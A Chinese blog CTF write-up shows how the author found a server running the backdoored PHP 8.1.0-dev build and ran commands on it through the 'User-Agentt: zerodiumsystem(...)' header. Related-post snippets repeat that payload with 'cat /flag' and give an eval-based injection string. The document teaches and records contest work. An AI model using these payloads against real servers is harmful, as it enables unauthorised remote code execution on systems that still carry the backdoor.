CUMTctf web 细心点

最新推荐文章于 2024-05-27 22:11:44 发布
最新推荐文章于 2024-05-27 22:11:44 发布
阅读量139 收藏
点赞数
分类专栏: CUMT校赛的成长之旅
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56598320/article/details/117455054
版权

进行抓包,得到返回包

看出返回包中X-Powered-By: PHP/8.1.0-dev

在进行百度搜索后得到信息

PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。

漏洞利用

使用burp抓包,并加入命令

User-Agentt: zerodiumsystem("id");

发现被成功执行

 

接着尝试flag.php是否可被解析执行

 

得到flag

BLS の 菜鸡
关注
专栏目录
CUMT 2018决赛 部分write up
0verWatch的博客
05-21 706
前言 因为上学期进入了决赛,于是在上周六进行了决赛,感觉自己还是太渣,最后只能跟队友做了两道题目拿了个三等奖,还是记录一下解题过程吧 正文 Jerry’s Site 1 这个题目一开始忘了扫后台目录,直到有了hint存在admin后台并且存在弱口令才开始解决这道题目了,以后没思路的时候还是要扫描一波后台啊。。。说不定就有特别的发现了啊 根据弱口令,尝试用户名密码都是admin进入...
CUMTCTF2020-10.20WP
weixin_45982862的博客
11-02 1005
WP ##Crypto 1.Classical 密文:Elxyi lrw fqfjyxl pr wixx yajy chb qtsk lqfjzrx zs xuua vafe chb nfsl pcgy es ipgv tzxo ywzq rvyc djxcfx lrw oyr tzxo ytc vxhp! Orwto pmlx rvy hafm vh icitt;kz wzxtx dzy phre tg zq;uj hlta czu otpm yz fx,iinamlg rtf ltci zndr qgj
2021虎符杯web(部分)
羽的博客
04-04 2322
签到 根据提示直接在网上搜新闻。 这个后门代码很简单,它被加到zlib扩展里,当发现请求User-Agentt中包含字符串zerodium时,则用eval执行User-Agent第8位字符后内容。黑客大概是希望传入并执行zerodiumphpinfo();这样的内容。 也就是说zerodiumsystem将会有system函数的功能。 payload: unsetme 在网站上下载下来源码,修改index.php后本地搭建。 开启报错后爆出关键内容 找到代码位置 其中$key为我们传入的a的内容
PHP zerodium后门漏洞
内心不种满鲜花就会长满杂草
05-18 7056
目录 一. 漏洞概述 二. 漏洞影响 三. 漏洞复现 一. 漏洞概述 PHP开发工程师Jake Birchall在对其中一个恶意COMMIT的分析过程中发现,在代码中注入的后门是来自一个PHP代码被劫持的网站上,并且采用了远程代码执行的操作,并且攻击者盗用了PHP开发人员的名义来提交此COMMIT。 目前为止PHP官方并未就该事件进行更多披露,表示此次服务器被黑的具体细节仍在调查当中。由于此事件的影响,PHP的官方代码库已经被维护人员迁移至GitHub平台,之后的相关代码更新、修改将会都在GitH
web题解,基础知识巩固(qsnctf)
Z11762的博客
05-27 949
shell是一个用 C 语言编写的程序,它是用户使用 Linux 的桥梁。Shell 既是一种命令语言,又是一种程序设计语言。Shell 是指一种应用程序,这个应用程序提供了一个界面,用户通过这个界面访问操作系统内核的服务。为什么要学习和使用shell?Shell属于内置的脚本,程序开发的效率非常高,依赖于功能强大的命令可以迅速地完成开发任务(批处理)语法简单,代码写起来比较轻松,简单易学。
2021虎符CTF-Web前三题
Y4tacker的博客
04-04 1563
文章目录web签到unset慢慢做管理系统 web 签到 一个最近刚爆出来的php后门,直接一把梭 User-Agentt: zerodiumsystem("cat /flag"); unset 一开始百度搜一下发现是fatfree框架,然后github一瞬间获取源码,本地搭建发现报错嘻嘻 syntax error, unexpected '.', expecting :: (T_PAAMAYIM_NEKUDOTAYIM) [G:\phpstudy_pro\WWW\yyds.top\lib\base.ph
2021数字中国创新大赛虎符网络安全赛-Writeup
末初的CSDN博客
04-04 4902
文章目录Web签到unsetme“慢慢做”管理系统Misc你会日志分析吗sectraffic Web 签到 http://cn-sec.com/archives/313267.html User-Agentt: zerodiumsystem("cat /flag"); unsetme 这题先放着 /?a=:[]);eval($_GET[1]);//&1=system(%27cat%20/flag%27); “慢慢做”管理系统 根据题目提示,这里第一步登录应该利用一些字符串被md5
BUUCTF:LSB,ningen,FLAG
m0_61460513的博客
03-27 1057
目录 1.LSB 2.ningen 3.FLAG 1.LSB 下载并解压得到图片。 题目提示为LSB,使用StegSolve打开 使用按钮,观察结果,发现Red Green Blue plane0时图片上方出现异常 使用Analyse,选择Red Green Blue plane0,选择LSB模式,Previwe发现png文件,save bin保存为png文件 得到二维码图片,扫码得到flag cumtctf{1sb_i4_...
CUMT平台的部分题解
0verWatch的博客
11-30 3202
前言 最近在上网路安全实验课程的时候,其中一个任务就是完成这里面的题目,我还是记录一下吧(还没做完,持续更新) basic部分 decode 这个题目下载之后是一个压缩包,但是里面什么东西也没有,于是放进HXD里面查看是否有其他的东西,打开发现十六进制编码,用Hackbar解码得到flag 白驹过隙 题目的意思是说快,打开页面就会发现错过了flag之类的操作,肯定是存在跳转,老题目要么就抓包,...
MISC_image
煤矿路口西的博客
11-11 2093
MISC image 启示:切忌形成惯性思路 尽管总结有益,亦是为了形成常见的解题思路。尽管浅薄的笔者通过上述几种方法,的确能独立解出一定比例的图像MISC题,但出题者永远比你懂得多、想得多。要学会跳出固定范式,灵活运用! 1 winhex改变图片规格 大白 看不到图? 是不是屏幕太小了 注意:得到的 flag 请包上 flag{} 提交 此为原始图像???? 观察到大白为半身图,丢进winhex查看,实为png图像没错;结合提示(如果在kali中无法正常浏览图片也可以做接下来的操作),更
Linux下使用system()函数(一定要谨慎)
weixin_49356927的博客
11-11 1216
函数原型 包含在头文件 “stdlib.h” 中 int system(const char *command); 函数功能 执行 dos(windows系统) 或 shell(Linux/Unix系统) 命令,参数字符串command为命令名。另,在windows系统下参数字符串不区分大小写。 说明:在windows系统中,system函数直接在控制台调用一个command命令。 在Linux/Unix系统中,system函数会调用fork函数产生子进程,由子进程来执行command命令,命令执行完后
揭秘“0 day漏洞”:一款强大却脆弱的武器
systemino的博客
05-24 551
所谓“0 day漏洞”就是尚未被供应商修复的安全漏洞,且这些漏洞可被恶意行为者滥用并转化为一款威力强大但却脆弱的攻击武器。近年来,越来越多的证据显示,各国政府正在购买和使用0 day漏洞用于军事、情报和执法目的——当然,这是一种极具争议的做法,因为这会导致社会无力抵御发现了相同漏洞的其他攻击者。 在黑市上,0 day漏洞属于高价商品,但有漏洞悬赏项目鼓励安全人员发现并向供应商报告这些安全漏洞。修...
PHP 8.1.0-dev后门复现
weixin_46137328的博客
01-18 1973
0x01 简介PHP verion 8.1.0-dev于2021年3月28日被植入后门,但是后门很快被发现并删除。当受害者使用该后门PHP代码时,攻击者可以通过修改User-Agent头来...
2021虎符初赛Web部分题解
feng的博客
04-05 1488
前言 这个WP还是直接复制粘贴的当时随手写的WP。。。太懒了别骂了呜呜呜。。。 签到 几天前PHP的那个后门,当时笑死我了的那个User-Agentt。 User-Agentt: zerodiumsystem("cat /flag"); unsetme fatfree框架,搜一下有一个漏洞符合,即3.7.1的代码注入,但是题目打不通,怀疑是因为版本的问题,下载3.7.3的fatfree看一下,主要是这部分: $val=preg_replace('/^(\$hive)/','$this->hive',
HackTheBox-Knife靶场实战
qq_36584013的博客
05-26 637
HackTheBox-Knife靶场实战 靶场信息 信息搜集 首先使用nmap进行端口扫描 我们得知开启了22和80端口 出于能不爆破就不爆破的原则,先访问80端口看一下 80端口上的内容有不明所以。 在完全没思路的情况下,尝试使用dirbuster工具进行了目录爆破,但四十分钟过去了却没有一丁收获,连robots.txt页面也不存在。 我的思路就卡在这里了,一时之间不知道应该...
PHP 的 Git 服务器被黑客入侵,源码库将永久迁移至 GitHub!
热门推荐
CSDN资讯
03-30 1万+
整理 | 郑丽媛 出品 | CSDN(ID:CSDNnews) 作为在服务器端执行的脚本语言,PHP 尤为适用于 Web 开发并可嵌入 HTML 中,因此许多个人和企业网站的开发都习惯了 PHP 的便捷。 可近日,PHP 官方 Git 仓库却被黑客攻击,致代码库遭篡改,恶意代码植入了一个远程代码执行的后门,即黑客可远程接管任何使用 PHP 的网站! 两个冒名的恶意提交 上周日,PHP 的开发者兼维护者 Nikita Popov 表示,在 git.php.net 服务器上维护的 php-src 存储库中发.
c语言盒子接球游戏源码.rar
11-15
c语言盒子接球游戏源码
YOLOv8-streamlit-app软件,使用yolov8做的物体识别语义分割姿态检测,使用streamlit做的显示界面
11-15
YOLOv8-streamlit-app软件,使用yolov8做的物体识别语义分割姿态检测,使用streamlit做的显示界面。下载即可运行,可做毕业设计。
MATLAB与计算物理课程 (第十周)第三章线性方程组的迭代法 共70页.pptx
最新发布
11-15
MATLAB与计算物理课程 (第十周)第三章线性方程组的迭代法 共70页.pptx
在线日语培训平台 SSM毕业设计 附带论文.zip
11-15
在线日语培训平台 SSM毕业设计 附带论文 启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值